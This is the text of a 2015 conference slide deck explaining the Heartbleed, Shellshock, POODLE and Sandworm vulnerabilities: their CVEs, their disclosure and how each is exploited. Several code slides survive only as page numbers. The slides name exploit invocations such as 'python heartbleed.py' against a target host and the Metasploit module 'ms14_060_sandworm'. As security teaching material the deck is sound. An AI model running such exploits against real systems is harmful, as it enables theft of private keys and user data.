Beruflich Dokumente
Kultur Dokumente
Name Generator(s)
Miroslav tampar
(mstampar@zsis.hr)
Introduction(.jpg)
Heartbleed (1)
CVE-2014-0160 (5.0)
Discovered independently by Neel Mehta
(@Google) and @Codenomicon in rough the same
time (while bug was there for years :)
Public disclosure on April 7, 2014
OpenSSL's (1.0.1 before 1.0.1g) TLS heartbeat
extension (RFC6520) buffer over-read vulnerability
Allows attackers to retrieve private cryptographic
keys and private user data
It is estimated that 24-55% HTTPS servers in Alexa
Top 1 Million were initially vulnerable
FER 2015, Zagreb (Croatia)
Heartbleed (2)
Heartbeat extension provides a mean to test and
keep alive the secure communication connections
Heartbeat Request message is being sent
consisting of a payload (typically a text value),
while the receiver has to send exactly the same
payload back to sender
Message returned is based on length field (max.
64KB in case of attack) in the requesting message,
without properly checking the actual payload's
length (e.g. foobar)
Heartbleed (3)
Response consists of payload, followed by
whatever else happened to be in the allocated
memory buffer (in case of faked payload length)
Attack is performed repeatedly in hope to read a
chunk previously used by OpenSSL (e.g. server
private key, session cookies, credentials, etc.)
OpenSSL uses custom memory allocator making
exploitation far easier (non-random/reusable
memory chunks are being allocated)
Lots of criticism followed, especially against
OpenSSL's sloppy coding style (e.g. LibreSSL
developers removed half of the OpenSSL source
tree in a week)
FER 2015, Zagreb (Croatia)
Heartbleed (4)
10
Heartbleed (5)
python heartbleed.py www.target.com
11
12
13
14
15
16
Shellshock (1)
CVE-2014-6271 (10.0), CVE-2014-6277 (10.0), CVE2014-6278 (10.0), CVE-2014-7169 (10.0), CVE2014-7186 (10.0) and CVE-2014-7187 (10.0)
Discovered by Stphane Chazelas
Public disclosure on September 24, 2014
Remote code execution through Bash
Many *nix and *BSD Internet-facing systems
expose Bash to client requests (e.g. HTTP (CGI),
DHCP, SSH, CUPS, etc.)
Bash supports exporting not just shell variables,
but also shell functions to other bash instances
FER 2015, Zagreb (Croatia)
17
Shellshock (2)
Sample function definition in Bash:
18
Shellshock (3)
HTTP requests to CGI scripts have been identified
as the major attack vector
The CGI specification maps all parts of requests to
environment variables (e.g. Host header to
$REMOTE_HOST variable)
CGI programs written in Perl, PHP, Python, Ruby
and Bash itself are potentially vulnerable
Sample vulnerable script:
19
Shellshock (4)
Sample attack:
20
POODLE (1)
CVE-2014-3566 (4.3)
Discovered by Bodo Mller, Thai Duong and
Krzysztof Kotowicz (@Google)
Public disclosure on October 14, 2014
Padding Oracle On Downgraded Legacy
Encryption
Padding Oracle attack against CBC mode of
operation in SSL 3.0 (exploiting same flaw as in
BEAST attack)
In case of TLS usage, forced version downgrade
from TLS to SSL 3.0 MiTM attack is performed
Major browsers voluntary downgrade to SSL 3.0 if
TLS handshakes fail
FER 2015, Zagreb (Croatia)
21
POODLE (2)
SSL 3.0 (deprecated 15 years ago) uses nondeterministic CBC padding, which makes padding
oracle attacks possible in MiTM environment
Padding is performed to make input plaintext
length equal to a multiple of the cipher's block size
(e.g. 8 bytes in case of 3DES and 16 bytes in case
of AES)
SSL 3.0 adds padding filled with single byte
denoting the length of padding itself
In padding oracle attack server leaks data whether
the padding of an encrypted message is correct or
not
FER 2015, Zagreb (Croatia)
22
POODLE (3)
23
POODLE (4)
In POODLE attack presumption is that victim runs
malicious Javascript in a browser which causes the
browser to make attacker controlled requests (with
cookies) to the origin of interest (e.g. google.com)
Attacker intercepts one such controlled encrypted
request, takes block which contains value of
interest (e.g. one shifted cookie byte followed by
spaces), replaces last (padding) block with its
content and forwards it to the server
If server doesn't drop such skewed request, it can
be concluded that the last byte of decrypted block
that was duplicated, XORed with the ciphertext of
the previous block, equals to the known padding
block
FER 2015, Zagreb (Croatia)
24
Sandworm (1)
CVE-2014-4114 (9.3)
Identified by @iSIGHT from same named cyberattack campaign
Public disclosure on October 15, 2014
Microsoft Windows OLE arbitrary code execution
Windows Vista SP2, Windows 7/8, Windows Server
2008/2012 are known to be vulnerable
Problem lies in how Object Packager 2 component
(packager.dll) handles an INF file that contains
malicious registry changes (e.g. RunOnce)
INF can't be loaded (and executed) directly but can
be forced by embedding the file path as a remote
share in an OLE object
FER 2015, Zagreb (Croatia)
25
Sandworm (2)
msfconsole (ms14_060_sandworm)
26
Sandworm (3)
27
Questions?
28